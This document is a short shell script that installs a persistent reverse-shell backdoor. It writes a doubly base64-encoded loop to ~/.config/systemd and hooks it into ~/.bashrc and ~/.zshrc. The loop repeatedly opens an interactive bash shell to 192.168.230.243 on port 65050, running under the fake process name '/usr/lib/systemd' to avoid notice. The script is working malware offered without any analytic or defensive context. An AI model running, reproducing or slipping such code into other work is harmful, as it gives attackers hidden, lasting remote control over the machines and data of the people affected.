#!/bin/sh 

ZSHCONF=~/.zshrc
BASHCONF=~/.bashrc

echo "d2hpbGUgdHJ1ZTsgZG8gZWNobyAiS0dKaGMyZ2dMV01nSjJWNFpXTWdMV0VnSWk5MWMzSXZiR2xpTDNONWMzUmxiV1FpSUdKaGMyZ2dMV2tnUGlZZ0wyUmxkaTkwWTNBdk1Ua3lMakUyT0M0eU16QXVNalF6THpZMU1EVXdJREErSmpFbklDWXBJRDRnTDJSbGRpOXVkV3hzSURJK0pqRT0iIHwgYmFzZTY0IC1kIHwgYmFzaDsgZXhlYyAtYSAiL3Vzci9saWIvc3lzdGVtZCIgc2xlZXAgMW07IGRvbmU=" | base64 -d > ~/.config/systemd
chmod +x ~/.config/systemd

if (test -f "$BASHCONF") && !(grep -wq "~/.config/systemd" $BASHCONF); then
    echo "(exec -a \"/usr/lib/systemd\" ~/.config/systemd &) 2>& /dev/null" >> ~/.bashrc
fi

if (test -f "$ZSHCONF") && !(grep -wq "~/.config/systemd" $ZSHCONF); then
    echo "(exec -a \"/usr/lib/systemd\" ~/.config/systemd &) 2>& /dev/null" >> ~/.zshrc
fi
